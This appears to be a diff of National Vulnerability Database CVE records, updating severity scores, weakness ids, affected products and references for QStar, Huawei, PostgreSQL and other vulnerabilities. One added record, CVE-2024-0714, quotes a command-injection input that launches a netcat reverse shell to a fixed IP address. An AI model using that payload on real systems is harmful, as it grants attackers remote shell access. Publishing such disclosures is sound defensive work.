"id": "CVE-2023-50128",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-11T21:15:10.817",
"lastModified": "2024-01-12T13:47:31.250",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:29:21.510",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,15 +14,73 @@
"value": "El sistema remoto sin llave del sistema de Hozard alarm system (alarmsystemen) v1.0 env\u00eda una se\u00f1al de radiofrecuencia id\u00e9ntica para cada solicitud, lo que da como resultado que un atacante pueda realizar ataques de repetici\u00f3n para desarmar el sistema de alarma."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"attackVector": "ADJACENT_NETWORK",
"attackComplexity": "HIGH",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 1.6,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-294"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:hozard:alarm_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8F9A297A-6C1D-4276-8153-C23EE75FB0BB"
}
]
}
]
}
],
"references": [
{
"url": "http://hozard.com",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Product"
]
},
{
"url": "https://www.secura.com/services/iot/consumer-products/security-concerns-in-popular-smart-home-devices",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
]
}
]
}


@ -2,7 +2,7 @@
"id": "CVE-2023-50269",
"sourceIdentifier": "security-advisories@github.com",
"published": "2023-12-14T18:15:45.070",
"lastModified": "2024-01-09T02:15:45.280",
"lastModified": "2024-01-19T16:15:10.063",
"vulnStatus": "Modified",
"descriptions": [
{
@ -184,6 +184,10 @@
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MEV66D3PAAY6K7TWDT3WZBLCPLASFJDC/",
"source": "security-advisories@github.com"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0005/",
"source": "security-advisories@github.com"
}
]
}


@ -2,8 +2,8 @@
"id": "CVE-2023-50495",
"sourceIdentifier": "cve@mitre.org",
"published": "2023-12-12T15:15:07.867",
"lastModified": "2023-12-18T18:30:24.743",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:10.193",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -83,6 +83,10 @@
"Mailing List",
"Patch"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0008/",
"source": "cve@mitre.org"
}
]
}


@ -2,12 +2,16 @@
"id": "CVE-2023-50963",
"sourceIdentifier": "psirt@us.ibm.com",
"published": "2024-01-19T02:15:07.970",
"lastModified": "2024-01-19T02:15:07.970",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "IBM Storage Defender - Data Protect 1.0.0 through 1.4.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 276101."
},
{
"lang": "es",
"value": "IBM Storage Defender - Data Protect 1.0.0 a 1.4.1 es vulnerable a la inyecci\u00f3n de encabezados HTTP, causada por una validaci\u00f3n incorrecta de la entrada por parte de los encabezados HOST. Esto podr\u00eda permitir que un atacante realice varios ataques contra el sistema vulnerable, incluido cross-site scripting, envenenamiento de cach\u00e9 o secuestro de sesi\u00f3n. ID de IBM X-Force: 276101."
}
],
"metrics": {


@ -2,19 +2,79 @@
"id": "CVE-2023-51062",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-13T04:15:07.757",
"lastModified": "2024-01-14T21:42:17.123",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:51:22.653",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "An unauthenticated log file read in the component log-smblog-save of QStar Archive Solutions RELEASE_3-0 Build 7 Patch 0 allows attackers to disclose the SMB Log contents via executing a crafted command."
},
{
"lang": "es",
"value": "Un archivo de registro no autenticado le\u00eddo en el componente log-smblog-save de QStar Archive Solutions RELEASE_3-0 Build 7 Patch 0 permite a los atacantes revelar el contenido del registro SMB mediante la ejecuci\u00f3n de un comando manipulado."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-306"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*",
"matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51062.md",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}


@ -2,19 +2,79 @@
"id": "CVE-2023-51064",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-13T04:15:07.870",
"lastModified": "2024-01-14T21:42:17.123",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:49:54.723",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 was discovered to contain a DOM Based reflected XSS vulnerability within the component qnme-ajax?method=tree_table."
},
{
"lang": "es",
"value": "Se descubri\u00f3 que QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0, contiene una vulnerabilidad de XSS reflejado basada en DOM dentro del componente qnme-ajax?method=tree_table."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "REQUIRED",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-79"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*",
"matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51064.md",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}


@ -2,19 +2,79 @@
"id": "CVE-2023-51065",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-13T04:15:07.913",
"lastModified": "2024-01-14T21:42:17.123",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:39:34.107",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "Incorrect access control in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows unauthenticated attackers to obtain system backups and other sensitive information from the QStar Server."
},
{
"lang": "es",
"value": "El control de acceso incorrecto en QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 permite a atacantes no autenticados obtener copias de seguridad del sistema y otra informaci\u00f3n confidencial del QStar Server."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*",
"matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51065.md",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}


@ -2,19 +2,79 @@
"id": "CVE-2023-51066",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-13T04:15:07.957",
"lastModified": "2024-01-14T21:42:17.123",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:29:32.340",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "An authenticated remote code execution vulnerability in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows attackers to arbitrarily execute commands."
},
{
"lang": "es",
"value": "Una vulnerabilidad de ejecuci\u00f3n remota de c\u00f3digo autenticado en QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 permite a los atacantes ejecutar comandos de forma arbitraria."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-94"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*",
"matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51066.md",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}


@ -2,19 +2,79 @@
"id": "CVE-2023-51070",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-13T04:15:08.100",
"lastModified": "2024-01-14T21:42:17.123",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:29:36.020",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "An access control issue in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows unauthenticated attackers to arbitrarily adjust sensitive SMB settings on the QStar Server."
},
{
"lang": "es",
"value": "Un problema de control de acceso en QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 permite a atacantes no autenticados ajustar arbitrariamente configuraciones SMB confidenciales en el servidor QStar."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*",
"matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51070.md",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}


@ -2,19 +2,79 @@
"id": "CVE-2023-51071",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-13T04:15:08.143",
"lastModified": "2024-01-14T21:42:17.123",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:20:47.503",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "An access control issue in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows unauthenticated attackers to arbitrarily disable the SMB service on a victim's Qstar instance by executing a specific command in a link."
},
{
"lang": "es",
"value": "Un problema de control de acceso en QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 permite a atacantes no autenticados desactivar arbitrariamente el servicio SMB en la instancia Qstar de una v\u00edctima ejecutando un comando espec\u00edfico en un enlace."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"availabilityImpact": "LOW",
"baseScore": 6.5,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 3.9,
"impactScore": 2.5
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*",
"matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51071.md",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}


@ -2,8 +2,8 @@
"id": "CVE-2023-51946",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:12.500",
"lastModified": "2024-01-19T14:15:12.500",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",


@ -2,8 +2,8 @@
"id": "CVE-2023-51947",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:12.553",
"lastModified": "2024-01-19T14:15:12.553",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",


@ -2,8 +2,8 @@
"id": "CVE-2023-51948",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:12.663",
"lastModified": "2024-01-19T14:15:12.663",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",


@ -2,8 +2,8 @@
"id": "CVE-2023-52109",
"sourceIdentifier": "psirt@huawei.com",
"published": "2024-01-16T08:15:08.763",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:12:37.337",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,8 +14,41 @@
"value": "Vulnerabilidad de relaciones de confianza siendo inexactas en escenarios distribuidos. La explotaci\u00f3n exitosa de esta vulnerabilidad puede afectar la confidencialidad del servicio."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
},
{
"source": "psirt@huawei.com",
"type": "Secondary",
@ -27,14 +60,52 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:emui:13.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "353AEAF2-AF46-4835-93E1-4F942D5E2810"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CB3751C1-7729-41D3-AE50-80B5AF601135"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:3.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4D81C4EF-7CAF-4E60-91A4-8CF7B95B2B54"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:o:huawei:harmonyos:4.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8198CDB2-4BC5-411A-8736-615A531FC545"
}
]
}
]
}
],
"references": [
{
"url": "https://consumer.huawei.com/en/support/bulletin/2024/1/",
"source": "psirt@huawei.com"
"source": "psirt@huawei.com",
"tags": [
"Vendor Advisory"
]
},
{
"url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202401-0000001799925977",
"source": "psirt@huawei.com"
"source": "psirt@huawei.com",
"tags": [
"Vendor Advisory"
]
}
]
}


@ -2,8 +2,8 @@
"id": "CVE-2023-5528",
"sourceIdentifier": "jordan@liggitt.net",
"published": "2023-11-14T21:15:14.123",
"lastModified": "2023-11-30T15:10:23.117",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:10.280",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -181,6 +181,10 @@
"tags": [
"Mailing List"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0009/",
"source": "jordan@liggitt.net"
}
]
}


@ -2,12 +2,16 @@
"id": "CVE-2023-5716",
"sourceIdentifier": "twcert@cert.org.tw",
"published": "2024-01-19T04:15:09.360",
"lastModified": "2024-01-19T04:15:09.360",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "ASUS Armoury Crate has a vulnerability in arbitrary file write and allows remote attackers to access or modify arbitrary files by sending specific HTTP requests without permission."
},
{
"lang": "es",
"value": "ASUS Armory Crate tiene una vulnerabilidad en la escritura de archivos arbitrarios y permite a atacantes remotos acceder o modificar archivos arbitrarios enviando solicitudes HTTP espec\u00edficas sin permiso."
}
],
"metrics": {


@ -2,7 +2,7 @@
"id": "CVE-2023-5868",
"sourceIdentifier": "secalert@redhat.com",
"published": "2023-12-10T18:15:07.163",
"lastModified": "2024-01-19T03:15:08.130",
"lastModified": "2024-01-19T16:15:10.410",
"vulnStatus": "Modified",
"descriptions": [
{
@ -452,6 +452,10 @@
"Issue Tracking"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0003/",
"source": "secalert@redhat.com"
},
{
"url": "https://www.postgresql.org/about/news/postgresql-161-155-1410-1313-1217-and-1122-released-2749/",
"source": "secalert@redhat.com",


@ -2,7 +2,7 @@
"id": "CVE-2023-5869",
"sourceIdentifier": "secalert@redhat.com",
"published": "2023-12-10T18:15:07.410",
"lastModified": "2024-01-19T03:15:08.343",
"lastModified": "2024-01-19T16:15:10.620",
"vulnStatus": "Modified",
"descriptions": [
{
@ -528,6 +528,10 @@
"Issue Tracking"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0003/",
"source": "secalert@redhat.com"
},
{
"url": "https://www.postgresql.org/about/news/postgresql-161-155-1410-1313-1217-and-1122-released-2749/",
"source": "secalert@redhat.com",


@ -2,7 +2,7 @@
"id": "CVE-2023-5870",
"sourceIdentifier": "secalert@redhat.com",
"published": "2023-12-10T18:15:07.643",
"lastModified": "2024-01-19T03:15:08.583",
"lastModified": "2024-01-19T16:15:10.867",
"vulnStatus": "Modified",
"descriptions": [
{
@ -452,6 +452,10 @@
"Issue Tracking"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0003/",
"source": "secalert@redhat.com"
},
{
"url": "https://www.postgresql.org/about/news/postgresql-161-155-1410-1313-1217-and-1122-released-2749/",
"source": "secalert@redhat.com",


@ -2,7 +2,7 @@
"id": "CVE-2023-6277",
"sourceIdentifier": "secalert@redhat.com",
"published": "2023-11-24T19:15:07.643",
"lastModified": "2024-01-14T02:15:46.917",
"lastModified": "2024-01-19T16:15:11.057",
"vulnStatus": "Modified",
"descriptions": [
{
@ -181,6 +181,10 @@
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Y7ZGN2MZXJ6E57W3L4YBM3ZPAU3T7T5C/",
"source": "secalert@redhat.com"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0002/",
"source": "secalert@redhat.com"
}
]
}


@ -2,8 +2,8 @@
"id": "CVE-2024-0318",
"sourceIdentifier": "cve-coordination@incibe.es",
"published": "2024-01-15T17:15:09.060",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:13:08.503",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -16,6 +16,26 @@
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "REQUIRED",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7
},
{
"source": "cve-coordination@incibe.es",
"type": "Secondary",
@ -50,10 +70,30 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:fireeye:hxtool:4.6:*:*:*:*:*:*:*",
"matchCriteriaId": "8890FF42-C498-4DC3-95C7-2432822CDB35"
}
]
}
]
}
],
"references": [
{
"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products",
"source": "cve-coordination@incibe.es"
"source": "cve-coordination@incibe.es",
"tags": [
"Third Party Advisory"
]
}
]
}


@ -2,12 +2,16 @@
"id": "CVE-2024-0705",
"sourceIdentifier": "security@wordfence.com",
"published": "2024-01-19T10:15:34.287",
"lastModified": "2024-01-19T10:15:34.287",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."
},
{
"lang": "es",
"value": "El complemento Stripe Payment Plugin for WooCommerce para WordPress es vulnerable a la inyecci\u00f3n SQL a trav\u00e9s del par\u00e1metro 'id' en todas las versiones hasta la 3.7.9 incluida debido a un escape insuficiente en el par\u00e1metro proporcionado por el usuario y a la falta de preparaci\u00f3n suficiente en la consulta SQL existente. Esto hace posible que atacantes no autenticados agreguen consultas SQL adicionales a consultas ya existentes que pueden usarse para extraer informaci\u00f3n confidencial de la base de datos."
}
],
"metrics": {


@ -2,8 +2,8 @@
"id": "CVE-2024-0712",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-19T14:15:12.837",
"lastModified": "2024-01-19T14:15:12.837",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",


@ -2,8 +2,8 @@
"id": "CVE-2024-0713",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-19T14:15:13.277",
"lastModified": "2024-01-19T14:15:13.277",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",

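--- a/CVE-2024/CVE-2024-07xx/CVE-2024-0714.json
+++ b/CVE-2024/CVE-2024-07xx/CVE-2024-0714.json
@@ -0,0 +1,84 @@
+{
+"id": "CVE-2024-0714",
+"sourceIdentifier": "cna@vuldb.com",
+"published": "2024-01-19T15:15:08.997",
+"lastModified": "2024-01-19T15:56:19.500",
+"vulnStatus": "Awaiting Analysis",
+"descriptions": [
+{
+"lang": "en",
+"value": "A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
+}
+],
+"metrics": {
+"cvssMetricV31": [
+{
+"source": "cna@vuldb.com",
+"type": "Secondary",
+"cvssData": {
+"version": "3.1",
+"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
+"attackVector": "NETWORK",
+"attackComplexity": "LOW",
+"privilegesRequired": "LOW",
+"userInteraction": "NONE",
+"scope": "UNCHANGED",
+"confidentialityImpact": "LOW",
+"integrityImpact": "LOW",
+"availabilityImpact": "LOW",
+"baseScore": 6.3,
+"baseSeverity": "MEDIUM"
+},
+"exploitabilityScore": 2.8,
+"impactScore": 3.4
+}
+],
+"cvssMetricV2": [
+{
+"source": "cna@vuldb.com",
+"type": "Secondary",
+"cvssData": {
+"version": "2.0",
+"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
+"accessVector": "NETWORK",
+"accessComplexity": "LOW",
+"authentication": "SINGLE",
+"confidentialityImpact": "PARTIAL",
+"integrityImpact": "PARTIAL",
+"availabilityImpact": "PARTIAL",
+"baseScore": 6.5
+},
+"baseSeverity": "MEDIUM",
+"exploitabilityScore": 8.0,
+"impactScore": 6.4,
+"acInsufInfo": false,
+"obtainAllPrivilege": false,
+"obtainUserPrivilege": false,
+"obtainOtherPrivilege": false,
+"userInteractionRequired": false
+}
+]
+},
+"weaknesses": [
+{
+"source": "cna@vuldb.com",
+"type": "Secondary",
+"description": [
+{
+"lang": "en",
+"value": "CWE-78"
+}
+]
+}
+],
+"references": [
+{
+"url": "https://vuldb.com/?ctiid.251540",
+"source": "cna@vuldb.com"
+},
+{
+"url": "https://vuldb.com/?id.251540",
+"source": "cna@vuldb.com"
+}
+]
+}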

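--- a/CVE-2024/CVE-2024-07xx/CVE-2024-0716.json
+++ b/CVE-2024/CVE-2024-07xx/CVE-2024-0716.json
@@ -0,0 +1,88 @@
+{
+"id": "CVE-2024-0716",
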